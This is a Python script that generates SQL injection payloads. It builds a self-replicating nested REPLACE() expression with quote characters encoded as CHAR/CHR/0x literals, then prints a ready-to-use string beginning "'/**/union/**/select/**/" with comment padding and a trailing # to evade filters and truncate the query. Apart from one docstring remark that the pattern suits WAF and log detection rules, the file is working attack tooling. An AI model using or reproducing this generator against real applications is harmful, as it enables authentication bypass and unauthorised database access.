# Placeholder layout the generator expands (see rep.reppay):
#   replace_S = REPLACE(REPLACE('replace_A',CHAR(34),CHAR(39)),<encoded replace_B>,'replace_A')
#   replace_A = REPLACE(REPLACE("replace_B",CHAR(34),CHAR(39)),<encoded replace_B>,"replace_B")


class rep:
    """Expand a ``REPLACE_BASE`` placeholder into a nested SQL ``REPLACE()`` expression.

    Attributes (assign on the instance before calling ``reppay``):
        replace_S: the template string; the token ``REPLACE_BASE`` marks
            where the nested ``REPLACE()`` expression is inserted.
        replace_B: the single character substituted into the expression
            (``ord`` is applied to it, so it must be exactly one character).
        replace_charfuc: how character codes are spelled in the output:
            ``CHAR``/``CHR`` (``CHAR(34)`` form) or ``0x`` (``0x22`` form).
            Matched case-insensitively; emitted with the caller's spelling.
        replace_A: intermediate value, the double-quoted variant of the
            expanded template.
        result: the final expanded string (also printed).

    NOTE(review): the emitted pattern -- nested REPLACE() whose quote
    arguments are CHAR()/CHR()/0x literals for codes 34 and 39 -- is
    distinctive and suits WAF / query-log detection rules.
    """

    replace_S = ""
    replace_A = ""
    replace_B = ""
    replace_charfuc = ""
    result = ""

    def _code_literals(self):
        """Return ``(encoded replace_B, encoded '"', encoded "'")`` in the configured spelling.

        Calls ``exit`` (raising ``SystemExit``) when ``replace_charfuc`` is
        not one of the supported spellings.
        """
        func = self.replace_charfuc
        kind = func.lower()
        if kind in ("char", "chr"):
            # CHAR(n) / CHR(n): decimal code in parentheses.
            return (
                func + "(" + str(ord(self.replace_B)) + ")",
                func + "(34)",
                func + "(39)",
            )
        if kind == "0x":
            # 0x prefix followed by the hex code, no separator.
            return (
                func + format(ord(self.replace_B), "x"),
                func + "22",
                func + "27",
            )
        exit("ERROR replace_charfuc")

    def reppay(self):
        """Build ``result`` from the template and print the intermediate strings.

        Side effects: overwrites ``replace_S``, ``replace_A`` and ``result``
        on the instance and prints them to stdout.
        """
        # 1. Expand REPLACE_BASE into the nested REPLACE() skeleton.
        skeleton = self.replace_S.replace(
            "REPLACE_BASE", "REPLACE(replace_temp,char_B,'replace_A')"
        ).replace(
            "replace_temp", "REPLACE('replace_A',tempchar_a,tempchar_b)"
        )
        self.replace_S = skeleton
        # 2. The inner copy uses double quotes and refers to replace_B instead.
        self.replace_A = skeleton.replace("'", '"').replace("replace_A", "replace_B")

        divider = "-" * 20
        print(divider)
        print("replace_S is " + self.replace_S)
        print("replace_A is " + self.replace_A)
        print("replace_B is " + self.replace_B)
        print(divider)

        # 3. Splice the inner copy into the skeleton, then the literal character.
        expanded = skeleton.replace("replace_A", self.replace_A)
        expanded = expanded.replace("replace_B", self.replace_B)
        self.result = expanded

        # 4. Spell the character codes in the requested CHAR/CHR/0x form
        #    (this is where an unsupported replace_charfuc bails out).
        code_b, code_dquote, code_squote = self._code_literals()
        for token, literal in (
            ("char_B", code_b),
            ("tempchar_a", code_dquote),
            ("tempchar_b", code_squote),
        ):
            expanded = expanded.replace(token, literal)
        self.result = expanded

        print("payload is\n")
        print(self.result)


payload = rep()
# Template to expand; put REPLACE_BASE where the REPLACE() part belongs.
payload.replace_S = "'/**/union/**/select/**/REPLACE_BASE#"
# The single character substituted during expansion; must be exactly one character.
payload.replace_B = "B"
# Spelling used for character codes: 0x, CHAR or CHR, in any letter case.
payload.replace_charfuc = "0x"
payload.reppay()